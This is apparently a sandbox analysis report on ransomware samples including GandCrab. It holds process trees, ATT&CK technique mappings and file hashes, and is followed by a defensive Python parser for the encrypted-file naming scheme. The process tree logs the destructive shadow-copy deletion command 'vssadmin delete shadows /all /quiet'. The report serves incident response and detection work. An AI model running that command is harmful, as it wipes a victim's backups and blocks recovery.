    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
    PID: 7668
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6012 /prefetch:8
    PID: 6304
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6108 /prefetch:8
    PID: 5964
  C:\Users\Admin\Downloads\Fantom.exe
    Command line: "C:\Users\Admin\Downloads\Fantom.exe"
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID: 5636
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2888 /prefetch:1
    PID: 4468
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4112 /prefetch:8
    PID: 7756
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6916 /prefetch:8
    PID: 5336
  C:\Users\Admin\Downloads\GandCrab.exe
    Command line: "C:\Users\Admin\Downloads\GandCrab.exe"
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Enumerates connected drives
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID: 5232
    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
      - System Location Discovery: System Language Discovery
      PID: 7260
-
C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 3152
-
C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 4500
-
C:\Windows\system32\taskmgr.exe
  Command line: "C:\Windows\system32\taskmgr.exe" /0
  - Checks SCSI registry key(s)
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID: 1820
-
C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 228
-
C:\Users\Admin\Downloads\ac\EVER\1saas\1sass.exe
  Command line: "C:\Users\Admin\Downloads\ac\EVER\1saas\1sass.exe"
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID: 3204
  C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe"
    PID: 4100
    C:\Windows\system32\mode.com
      Command line: mode con cp select=1251
      PID: 6320
    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin delete shadows /all /quiet
      - Interacts with shadow copies
      PID: 7332
-
C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 7920
-
C:\Windows\system32\taskmgr.exe
  Command line: "C:\Windows\system32\taskmgr.exe" /0
  PID: 6960
-
C:\Windows\system32\taskmgr.exe
  Command line: "C:\Windows\system32\taskmgr.exe" /0
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  PID: 6984
Network
MITRE ATT&CK Enterprise v15
Persistence
- Account Manipulation (1)
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Privilege Escalation
- Account Manipulation (1)
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Defense Evasion
- Direct Volume Access (1)
- Hide Artifacts (3)
  - Hidden Files and Directories (2)
  - Hidden Users (1)
- Impair Defenses (2)
  - Disable or Modify System Firewall (1)
  - Safe Mode Boot (1)
- Indicator Removal (2)
  - File Deletion (2)
- Modify Registry (3)
Credential Access
- Credentials from Password Stores (2)
  - Credentials from Web Browsers (1)
  - Windows Credential Manager (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Discovery
- Browser Information Discovery (1)
- Password Policy Discovery (1)
- Peripheral Device Discovery (2)
- Permission Groups Discovery (1)
  - Local Groups (1)
- Query Registry (6)
- System Information Discovery (6)
- System Location Discovery (1)
  - System Language Discovery (1)
Downloads
- Filesize: 624B
  MD5: b14823c1c65bcc59578857253851a613
  SHA1: 1cb6aba58ec4dbcca286f19b253bfd44c9d32654
  SHA256: 3307899f3c889257c75358eeeb06fd73e3a79259b6ae8bb340cd2667f230d0e3
  SHA512: b08782519cda5e097ac6a813b7b643a3f013b64294deabf89df3d32d1e85919d3c2a1d6b874a4aa5333a285a864c44bc9cc5828216bd555b711bfda866f185ad
- Filesize: 20KB
  MD5: 17c0eedc2c43d5db4dfd88ba18cd4e4a
  SHA1: 2ddb61b37841449ebf7e345db8c8703eaf79e0c8
  SHA256: c43487f16c9535e4eee38d5da35a283e5ccbfbffd3031014a21a2b84721c184c
  SHA512: 32b5db64d149c3bcf553e9d97e6bc6431c27b99cd34a8df91214256a4c7b348d62615c5b0c2d1975738ced976398045dda7ed098f18d597c203b8186dcf3ffd2
- Filesize: 20KB
  MD5: 9ba22d0460a40b8c6b2449227ce56921
  SHA1: f74d39ee4b02dddd8d8f66d1b5c67009140d8436
  SHA256: 78044d9354f93a1af1e1de76976d7b5f1474fa5638240b692fd19dbeec209b18
  SHA512: eb5e6595b393039b74019a53d6076b35b3f5068e73a99f5e1447ac9fa2fc2d343bfba559c4dbd291b4e5067eb97dc594a668b6192bf6c8284b54d7160986e4a7
- C:\$Recycle.Bin\S-1-5-21-2839013668-2276131261-2828740280-1000\desktop.ini.id-2DAA3087.[[email protected]].ROGER
  Filesize: 378B
  MD5: 8c708f5e3101c3755afeb4cafde4bf23
  SHA1: 25927bfe0bda4dc455666f278c224bf0c01919b4
  SHA256: e83166113e1e910ad75e7f8edda4aedd181c3d35345e70c239bddb9c8539f5ff
  SHA512: 2ed215c23246b8622d2f5e097d273ffcb82a8c652f16f4eee5e367ada584ffe8bcbf76e84ec5f36cbedf309b46302f25d1ea297549bf89b8e941afffb3d7d754
- C:\$Recycle.Bin\S-1-5-21-2839013668-2276131261-2828740280-1000\desktop.ini.id-2DAA3087.[[email protected]].ROGER
  Filesize: 918B
  MD5: c281a2d9df8ca05307372b01832d712c
  SHA1: 97604f5c0e70b333b755a65d74aff2d04c5d288f
  SHA256: 8056699a6c8639184bc40f29a98f1f9ac1c7db79b713296bafb20d8948d94cbb
  SHA512: 667db8171841a2a8e00a2211e64ac91870c38f1d955233b81655b15c2b8b3ce63e57559565359af852b12b56763e0c0d5c9dff05e325445e1f63e04b9a3bb457
- C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems32.dll.id-2DAA3087.[[email protected]].ROGER
  Filesize: 2.7MB
  MD5: 1006e01ddda64755804d18b80554a6ff
  SHA1: fa1be76d47c6602945ae99832b133fa50e19731a
  SHA256: e50ae9ca45ebef0931688cad0155efdc12303673c435ca9d966c2127ffbef571
  SHA512: 2792eb4e60cfd9a5913825e173ed5eb495434f1066ca50980eadf3128a2ffda80f71d7c87562b80f96b6b977f6fa36fc9edaf8df8a49f99c6d1d8a47ebe242f8
- Filesize: 11KB
  MD5: 67d1066fc6dbb07193c6738aae4bb17c
  SHA1: 75c4e2984f29f599ddc70311b65d0a539432540a
  SHA256: 162360a01db88c1800ce87f4421488967192326a614c0a014d08ca3e07bf0207
  SHA512: 736ecf0057059443ca797e5ae8b5f22c78a36a72402998be05999af9b15e992b8c5372338b7805e7e7f6cea78042aec0276e616ca132cafa5038a802379da4c0
- Filesize: 152B
  MD5: 0e97a507db8325bbdef7b1fcadf06f86
  SHA1: 7782c07045983db5ad0e43939b0c47b5f8e68736
  SHA256: 6f1f11f1f73b9c7c2e6866ea6759c409515884f382e22135c9ffde466accacb1
  SHA512: 47f8687649252eaa47447c56d53377577cfaad1d1a329f26d90d4b6a2f60110e022f262e98f77c409990909ed442e95a3a144971bda607fbbf8c5c52ca9f3f79
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 2KB
  MD5: 18b61cfbc7d8fe3dac617f9278225193
  SHA1: 721bf4c3b3f7c019dcb4c2a4b7b2cf089289c730
  SHA256: 0de47b549738f609032be78ba01dcd767d4fda43b8c7544a63b3bfd08e21583e
  SHA512: aab3a8236b6c3148dd23ec5b8055c8c4638fe1f40a7a26127badffdff49ce2b82d3648e1996bc6bc451921fe40c9c1bd454618dbfab23ff2b3bc3bf1dffd69fa
- Filesize: 111B
  MD5: 285252a2f6327d41eab203dc2f402c67
  SHA1: acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
  SHA256: 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
  SHA512: 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
- Filesize: 871B
  MD5: 3d54b4c74cae4dc0f409518ee6685b3d
  SHA1: deaf74f43e5ac1a10d38502cd6571b2defac5d97
  SHA256: 098e9f9b01145c2ca73bb6d5f83abb456328096964b4040a477528fd7fb1ff67
  SHA512: 0172d0602ec339c648b54e6f0d4e8b26e1f74def4555fa50976a68f9e8f44b444310c54bf8ceb3bcc0c18e6a102cd49a6c3398f29ca3a76e131d1badee16cfbc
- Filesize: 6KB
  MD5: 5265f55f405bb3011072ca345a50bd90
  SHA1: 4cf2d5c8b4c6cab0f6f2d302ad2206f9d808331d
  SHA256: 43a78526f61c69c0bdddea827a19296ca4e717e19d6714aea44e9a6fc5d67796
  SHA512: 4ea45a76edd944bd3343f080416b79992b264f57b8b24aa59f12de95cba66d9a94c88977f0bb2db5849a320b1ffcf32610a99ecea3656a3c513399e36e77e0ac
- Filesize: 6KB
  MD5: b8c43f59f69d02c5ed8a24b3a2f4bba7
  SHA1: 1153247e23a61921b1e69ab524fc5f9c6075466a
  SHA256: 1bc80f8e17e6bfb1935e6e7a0e529e77a9185a7e7cdcf3b2bde99127e23c8156
  SHA512: 47532f53e13d570e2542d17569df6f25b20ece88463477da421f79b7f136800370987f8a2b37442ac316bd638d4add68007dce4a15e7a3bbbf7cef469cc62d95
- Filesize: 5KB
  MD5: 5463c3a0cd52bd2368e9a02e58aeaacb
  SHA1: da0357337bb01388e93472d41b0d15afe18d2b96
  SHA256: f12574eab5ebc2ce2a44ea44e882f1486eccf58dd2af39f17039370ef00213ca
  SHA512: d61d937204f21cfc074d9c73487c1d8250e51c9e3382ca93730ff09e995c0f4e39a02743e5a08e1e13eab04da4997188b8a3a8f9dff0acaa5dfb90c2b6faa507
- Filesize: 6KB
  MD5: 66a7a102f2e90966a5f48e277b309a95
  SHA1: 37bfffd5b5ab82835605a6a922c5209460697a30
  SHA256: a162d0847c7cf8ad87bbcf18b2ad9a3493dc434ff82fa036b204db1512d768ec
  SHA512: 06c219e07661fd04919ffcc8f3c9ee7fc24ef45fb0c7a7dd63a156da10f558ab99a11f3f8c11003ff61b66f284fd9680888a51399475e8515b5569bd41f28397
- Filesize: 24KB
  MD5: 580f41a17061a1d849f7e9d60ff18aa6
  SHA1: 762fd39e2b9eb3e21d51f4ebd7c55e0557420800
  SHA256: 83637c94ec37e78e34bf1cda227eed230a7424e39f0dec45bc07cf3f4f22d139
  SHA512: 3ea6bae95cdf95e30429bd39dc5c8d0cd18337d63916972d21d0b86ae21b472fa1da6ff0f57f03268b447b47efd17b6ebd435df3737a3da562772b5f69038802
- Filesize: 1KB
  MD5: a80c0ea00ed236bf60be06507dc2ab70
  SHA1: 3a3ceacea5976e60a2c8fd954b928f5db0bd85f1
  SHA256: ddf05bd20f152dca7a3bac832c15288b7e19d5916ea5808de925993ae3698926
  SHA512: 9879849247edf0645b0d201d7cc04fe1ff3ee1869fec4e2c9aad6c4e84257fe8ba5345c0f56a11ac7c562cd7e8314ad590e0e9a8c48f5694e12b41e5f8df90a4
- Filesize: 1KB
  MD5: cec069e3ee5bf1b1a2ce489c18a87908
  SHA1: d41fb0d4095fee788819741c605262a27f9a2196
  SHA256: d9da75b83d1dbce781c0a993b95c73c57f4056c3983a25ddea032c26a27103b3
  SHA512: 707c7cef8842c7a74023fd631575966bcd4f74056f25fe89b94222ffbc0470347c1a8be595557a636128fe62ed666dab501125bb37388439c039bc989b3b2687
- Filesize: 1KB
  MD5: 5046c6e1a2a311e55928a33ad0394a7b
  SHA1: ebf1d866ec579c416fdd592df84b3e530dba944b
  SHA256: e6d62783776b9e24f4a7e82fbd860d810d2e3a47c7f1081f75904dd7d7759df2
  SHA512: 58c4c575e9e8e41c34b7ff608f90d75a79ee26417213df822ecd90b0425c5d7260b0a6f4c40fd778174225024e9ae8da0526c10fcd3813200d39498c63c0a6fa
- Filesize: 1KB
  MD5: 2f9ab6270358cd8fdeedf7503f76100f
  SHA1: aaf9fa6edbd05c0746f2c3f9c23dcdd2e52bd96c
  SHA256: 21b660bc08ce6b853f10c8e755cc38938c4c10cd946ac4519d9bb3d4c38b29fa
  SHA512: 4165f886749028dac5d66e65465445ced56dea3b0192578a9f88a40fc10a77329536611d127588ef4d5d19fe1330a5c006c490edab8e3938e26f2a7fab4a560b
- Filesize: 1KB
  MD5: 4531aadc6026c7355f2567f964822c44
  SHA1: d675ee50aa2f23d27d3b6c95c0489c9728bb3661
  SHA256: 0fbb7ca3953c9210210a58a23bc16166064c2a464b25fb886649f47749ead667
  SHA512: 59d381261393c92f6a071ffdcf63a98bf39190a85afa1ea50e298bb6d93ee2c4b22e303ef025a3e5aee02cfeb732f2818d6bce7b0ef7d5a8f8045c1422992227
- Filesize: 1KB
  MD5: 0a117c1bb54307adc58124f02193235c
  SHA1: 2394432e7697ef94c39e390869a8436aa7d5818b
  SHA256: 674ab8308304076cc0c54e7f9f799b9a716fafd8f5a84b6a2260afcdaae14e77
  SHA512: 9aadd162d33419404f153e18f0645aa44cedd78df6f2ab5bc4188c96c401c2831070eed2536e56ed5c583df19d729c547d718300c7f40e83c1e2f82f0b1db8fb
- Filesize: 1KB
  MD5: 15c1150ec18b099d5ee933132857a462
  SHA1: 4a2b8de66b55815d57536d1cc0d80daa03c79b65
  SHA256: c3fae0ca228f229892036711e1301fca2b8ffc7f2f4ec4b6df051b42d254764f
  SHA512: ca9ab8e926ad31a6906a41075abb76583b473629c60b8e01cfb6c48ccafab33cc5a903487f7b08044a0b2fcbe63e0f514b6a4cb1e88d8780ac61e5a2d7e77691
- Filesize: 1KB
  MD5: 57aab2d8a63b8f379cbe57b324452259
  SHA1: 5c3b14e48c2e4ba04ff7d60309ae83cb9d22fa7c
  SHA256: 6f386fb8d889a1ad3c09128d47f7da93cf105273c7dc8429e32d98cfda68bef1
  SHA512: e0819634e1dbfd765f7fbc27ce3e44659700b128323b1f9610a1dc6aedad5d172a5258ffde313b83b84daaf87f546929a338dd011d2ee78b3d893116a7bbb634
- Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
- Filesize: 10KB
  MD5: 3dd0602ec2560e5a2d382b385ca9f371
  SHA1: b96597a94efa9b4936334fcc6f248f45c00cc585
  SHA256: c5fd341020c6a048cb9e62e9903726137e1760583837820c8ecc661c7b73c47e
  SHA512: d5a22c2d64feb7b3de8f156e94a1f5a1a100e740f537721d41e4af481b64d5b1a83a39809b3ed9a6c07cb056e8de484f2db29deae1ad13394bd776ad6315ca8b
- Filesize: 11KB
  MD5: e3cdded299593e59ded475edefed25f9
  SHA1: c4c138e932722cb1cdecccada51880566b87e802
  SHA256: 7e7c28e1811e1540c8fb63c30f7d89d5937a9ccbb8e8bea74d92ce829992f3cf
  SHA512: 90f0e84f130a9fdcf6a0dff46ea7fff20fb375cd49e8b3d15d426d3f6d24e9f9beda5a46d849a8dccf60aca241a219b1da7eab0d25a1f607bcaeac3cf441a8e7
- Filesize: 11KB
  MD5: 2cebebda6fbcbbe3faa5ed9d02a95860
  SHA1: e82bd9cd9da1f844b15798426a07fc5c65bb9211
  SHA256: 5d97258c55106dca155c78a55cca8ae511673c3f5ece5591d6fbf82bb55e0e72
  SHA512: aca19902a652cec86b893802b0cddc6dc3c89c107a2a309095a45015ece94dabf5770b789ed34de3f27928ad1ace07bf611b9bda11543f615cfde1290e612ea9
- Filesize: 10KB
  MD5: 9cf9309ecab82139ec1371957f89afb3
  SHA1: f36431d167b98aa9e776506722e7b326d1e0c773
  SHA256: ec998fb67f621a2e8c70f2b68bbe261967c0349ed3e5933b1e5f721ed45b98f5
  SHA512: 174356645fff753fe3e41e139a2bd563149fc0453264ebe2e32bb16782df58749e975c6ab0f343a7e4cef0ec04439806f3688feafd3332076964a2158f7a6f39
- Filesize: 11KB
  MD5: 322b7aea60dd74d5c5830b785f0ff39f
  SHA1: f6e7033c57b7927761cc0015524c3f34a50364fa
  SHA256: 557f964d215949654e5f9119a8de680f747f806bf1507cdf29d93993e33bfc2b
  SHA512: 4111937ad6361bc35a9485dfc93f8e631758a8210452b0f22a7f72a46adf32909d0153fbc0d44b499247ce4f64803519c1b873fa2eb49806b5fc5d657bf3e8a4
- Filesize: 11.5MB
  MD5: 928e37519022745490d1af1ce6f336f7
  SHA1: b7840242393013f2c4c136ac7407e332be075702
  SHA256: 6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850
  SHA512: 8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c
- Filesize: 181KB
  MD5: 0826df3aaa157edff9c0325f298850c2
  SHA1: ed35b02fa029f1e724ed65c2de5de6e5c04f7042
  SHA256: 2e4319ff62c03a539b2b2f71768a0cfc0adcaedbcca69dbf235081fe2816248b
  SHA512: af6c5734fd02b9ad3f202e95f9ff4368cf0dfdaffe0d9a88b781b196a0a3c44eef3d8f7c329ec6e3cbcd3e6ab7c49df7d715489539e631506ca1ae476007a6a6
- Filesize: 261KB
  MD5: 7d80230df68ccba871815d68f016c282
  SHA1: e10874c6108a26ceedfc84f50881824462b5b6b6
  SHA256: f4234a501edcd30d3bc15c983692c9450383b73bdd310059405c5e3a43cc730b
  SHA512: 64d02b3e7ed82a64aaac1f74c34d6b6e6feaac665ca9c08911b93eddcec66595687024ec576e74ea09a1193ace3923969c75de8733859835fef45335cf265540
- Filesize: 291KB
  MD5: e6b43b1028b6000009253344632e69c4
  SHA1: e536b70e3ffe309f7ae59918da471d7bf4cadd1c
  SHA256: bfb9db791b8250ffa8ebc48295c5dbbca757a5ed3bbb01de12a871b5cd9afd5a
  SHA512: 07da214314673407a7d3978ee6e1d20bf1e02f135bf557e86b50489ecc146014f2534515c1b613dba96e65489d8c82caaa8ed2e647684d61e5e86bd3e8251adf
- Filesize: 92KB
  MD5: 0880430c257ce49d7490099d2a8dd01a
  SHA1: 2720d2d386027b0036bfcf9f340e325cd348e0d0
  SHA256: 056c3790765f928e991591cd139384b6680df26313a73711add657abc369028c
  SHA512: 0d7676f62b682d41fb0fe355119631a232e5d2ec99a5a0b782bbe557936a3226bbcce1a6effbba0cffde7ec048c4f7540aef0c38f158429de0adc1687bd73a11
- Filesize: 19KB
  MD5: 5531bbb8be242dfc9950f2c2c8aa0058
  SHA1: b08aadba390b98055c947dce8821e9e00b7d01ee
  SHA256: 4f03ab645fe48bf3783eb58568e89b3b3401956dd17cb8049444058dab0634d7
  SHA512: 3ce7e1d7b330cc9d75c3ce6d4531afe6bfa210a0bcbb45d4a7c29aabff79bebf3263fe0b5377956e2f88036b466383f001a7a6713da04a411b1aceb42bc38291
- Filesize: 1.6MB
  MD5: 8add121fa398ebf83e8b5db8f17b45e0
  SHA1: c8107e5c5e20349a39d32f424668139a36e6cfd0
  SHA256: 35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413
  SHA512: 8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273
- Filesize: 28B
  MD5: df8394082a4e5b362bdcb17390f6676d
  SHA1: 5750248ff490ceec03d17ee9811ac70176f46614
  SHA256: da3f155cfb98ce0add29a31162d23da7596da44ba2391389517fe1a2790da878
  SHA512: 8ce519dc5c2dd0bbb9f7f48bedf01362c56467800ac0029c8011ee5d9d19e3b3f2eff322e7306acf693e2edb9cf75caaf7b85eb8b2b6c3101ff7e1644950303d
- Filesize: 10.2MB
  MD5: f6a3d38aa0ae08c3294d6ed26266693f
  SHA1: 9ced15d08ffddb01db3912d8af14fb6cc91773f2
  SHA256: c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad
  SHA512: 814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515
- Filesize: 6.7MB
  MD5: f7d94750703f0c1ddd1edd36f6d0371d
  SHA1: cc9b95e5952e1c870f7be55d3c77020e56c34b57
  SHA256: 659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d
  SHA512: af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa
- Filesize: 125KB
  MD5: 597de376b1f80c06d501415dd973dcec
  SHA1: 629c9649ced38fd815124221b80c9d9c59a85e74
  SHA256: f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446
  SHA512: 072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b
- Filesize: 674KB
  MD5: b2233d1efb0b7a897ea477a66cd08227
  SHA1: 835a198a11c9d106fc6aabe26b9b3e59f6ec68fd
  SHA256: 5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da
  SHA512: 6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37
- Filesize: 1KB
  MD5: b4b2f1a6c7a905781be7d877487fc665
  SHA1: 7ee27672d89940e96bcb7616560a4bef8d8af76c
  SHA256: 6246b0045ca11da483e38317421317dc22462a8d81e500dee909a5269c086b5f
  SHA512: f883cea56a9ac5dcb838802753770494ce7b1de9d7da6a49b878d534810f9c87170f04e0b8b516ae19b9492f40635a72b3e8a4533d39312383c520abe00c5ae6
- F:\$RECYCLE.BIN\S-1-5-21-2839013668-2276131261-2828740280-1000\desktop.ini.id-2DAA3087.[[email protected]].ROGER
  Filesize: 918B
  MD5: a083c56103a05536284c9f02ec6a8e39
  SHA1: 5e2be3b98056e94d59b2e6ad0c358211051215a5
  SHA256: 9b053f3751e3b587ac9cd53cfaf16f70a34214d67f8ffd80da6d273785c661fd
  SHA512: fcc76c8ecf8df35a9344d41f645df7eb6da51fb4b88faad2fe018947a259abf11dfd2a0a2974cc8b3de9635247e6b18147b55a54abd1d662f3f9f9359b7d909c
- Filesize: 8KB
  MD5: dfc1fd3c3eeba9e26a6b6551dd31ce32
  SHA1: 7383fd0fb52d71603c3c5c8cc54ef84642b24809
  SHA256: 964d3fa3167db82e7adab82569c0cc1b928a6c8999924b5382cdca21bcc7c131
  SHA512: d9e2865a317ac83d9907fe62e89d0e9cb4f898bcfe0ef52d1bffb57422c011e90d99e499681e96211fd7fc96e0c9a5da0e5fd1e565099fe346cda622dabeefdd
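The encrypted files listed above follow one naming scheme: the original name, then .id-<8 hex characters> (2DAA3087 on every file here), then a bracketed contact address, then the appended extension .ROGER, and the renames reach both the C: and F: recycle bins. Pulling those fields out of file names is how a responder scopes an incident (one victim ID per machine, which volumes were touched, which extension to hunt for across shares). Below is an added example of that parser, not code from the report or from Triage. The contact address in the file names is not legible in the report as rendered, so the sample paths are constructed from the entries above with a placeholder address, and the field names and the 8-hex-character ID width are assumptions drawn from what this report shows.

```python
"""Parse Dharma-style encrypted file names and scope the affected volumes.

Added example for this report; not code from Triage or from the sample.
Pattern seen in the Downloads list:
    <original name>.id-<8 hex victim id>.[<contact>].<EXT>
The contact address is not recoverable from the report as rendered, so
SAMPLE_PATHS uses a placeholder address and is a constructed sample.
"""
import re
from collections import Counter

# Groups: original name, victim id (8 hex chars as in this report), bracketed contact,
# appended extension. Anchored so a file that merely contains ".id-" does not match.
RANSOM_NAME = re.compile(
    r"^(?P<original>.+?)"
    r"\.id-(?P<victim_id>[0-9A-Fa-f]{8})"
    r"\.\[(?P<contact>[^\]]+)\]"
    r"\.(?P<ext>[A-Za-z0-9]{2,16})$"
)

SAMPLE_PATHS = [  # constructed from the report's file list; contact address is a placeholder
    r"C:\$Recycle.Bin\S-1-5-21-2839013668-2276131261-2828740280-1000\desktop.ini.id-2DAA3087.[contact@example.invalid].ROGER",
    r"C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems32.dll.id-2DAA3087.[contact@example.invalid].ROGER",
    r"F:\$RECYCLE.BIN\S-1-5-21-2839013668-2276131261-2828740280-1000\desktop.ini.id-2DAA3087.[contact@example.invalid].ROGER",
    # Untouched file from the same listing: must not parse as encrypted.
    r"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index",
    # Constructed near-miss: has ".id-<hex>" but no contact/extension, must not match.
    r"C:\Users\Admin\Documents\report.id-2DAA3087.docx",
]


def parse_ransom_name(path):
    """Return dict(original, victim_id, contact, ext, drive) for an encrypted name, else None."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    m = RANSOM_NAME.match(name)
    if not m:
        return None
    parts = m.groupdict()
    # Drive letter if the path is an absolute Windows path; None for relative/UNC paths.
    parts["drive"] = path[0].upper() if len(path) > 1 and path[1] == ":" else None
    return parts


def summarize(paths):
    """Aggregate parsed names: file count, victim ids, extensions and volumes touched.

    More than one victim id or extension in a single host's listing usually means
    two infections or two campaigns, which changes the response plan."""
    parsed = [p for p in (parse_ransom_name(x) for x in paths) if p]
    return {
        "count": len(parsed),
        "victim_ids": Counter(p["victim_id"] for p in parsed),
        "extensions": Counter(p["ext"] for p in parsed),
        "drives": sorted({p["drive"] for p in parsed if p["drive"]}),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_PATHS))
```

On the sample this yields three encrypted files, a single victim ID 2DAA3087, a single extension ROGER and volumes C and F, which matches what the report's listing shows and is the shape of output worth attaching to the incident ticket. The same parser run over a file-server directory walk (os.walk in place of SAMPLE_PATHS) gives the blast radius without opening a single file.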